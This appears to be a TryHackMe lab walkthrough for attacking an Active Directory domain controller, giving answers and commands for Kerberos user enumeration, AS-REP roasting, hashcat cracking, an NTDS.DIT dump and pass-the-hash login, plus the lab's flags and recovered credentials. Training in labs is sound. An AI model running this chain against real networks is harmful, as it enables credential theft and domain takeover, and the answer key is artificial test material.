What tool will allow us to enumerate port 139/445?
Answer: enum4linux
What is the NetBIOS-Domain Name of the machine?
Answer: THM-AD
Context: If you use the following nmap command nmap -A -v -p139,445 10.10.79.210
you will get the results. You can also use enum4linux <ip>
What invalid TLD do people commonly use for their Active Directory Domain?
Answer: .local
What command within Kerbrute will allow us to enumerate valid usernames?
Answer: userenum
Context: First install kerbrute by downloading the kerbrute_linux_amd64
file from the GH repo here. Run the command ./kerbrute_linux_amd64
-h
What notable account is discovered? (These should jump out at you)
Answer: svc-admin
Context: This one requires some setup since kerbrute expects a domain name and not an IP address. we know from task 3 that the domain is spookysec.local. So you will need to edit the hosts file (/etc/hosts) and add the line <ip> spooky.sec
once that is complete you should be able to run the following command: ./kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt
What notable account is discovered? (These should jump out at you)
Answer: svc-admin
What is the other notable account is discovered? (These should jump out at you)
answer: backup
Abusing Kerberos
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Answer: svc-admin
Context: You will fist need to create a new txt file which includes the 2 notable accounts svc-admin and backup. Run the script using the command python3 /opt/impacket/examples/GetNPUsers.py
this will give you the parameters you required for the command which should result in looking something like the following (replace the txt file and ip with the correct ones):
python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile youtxtfile.txt -dc-ip 10.10.xx.xx spookysec.local/
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
Answer: Kerberos 5, etype 23, AS-REP
Context: From the results from the previous question, look at the first part of the result and compare in the wiki here.
What mode is the hash?
Answer: 18200
Context: Use the information from the previous question in the Wiki, the hash-mode is provided
Now crack the hash with the modified password list provided, what is the user accounts password?
Answer: management2005
Context: Store the hash in txt file and run the command hashcat -m18200 hash.txt passwordlist.txt
the answer will be found at the end of the hash in the results.
Domain Privilege Escalation
What method allowed us to dump NTDS.DIT?
Answer: DRSUAPI
Context: Once you run the file (secretsdump.py
) using the command python3 secretsdump.py -dc-ip spookysec.local backup:backup251786@spookysec.local
look at the results and you will see the method used.
What is the Administrators NTLM hash?
Answer: 0e0363213e37b94221497260b0bcb4fc
Context: Take look at the out again.
What method of attack could allow us to authenticate as the user without the password?
Answer: pass the hash
Context: google it 🙂
Using a tool called Evil-WinRM what option will allow us to use a hash?
Answer: -h
Context: Google as well and the readme file in their GH repo has a list of all the options.
Flag Submission
For this one, make sure you have Evil-WinRM installed and proceed to login using the Administrator username and hash from the previous questions. Your command for should look like evil-winrm -i [Target_IP] -u Administrator -H [Administrator_Hash]
svc-admin
Answer: TryHackMe{K3rb3r0s_Pr3_4uth}
backup
Answer: TryHackMe{B4ckM3UpSc0tty!}
Administrator
Answer: TryHackMe{4ctiveD1rectoryM4st3r}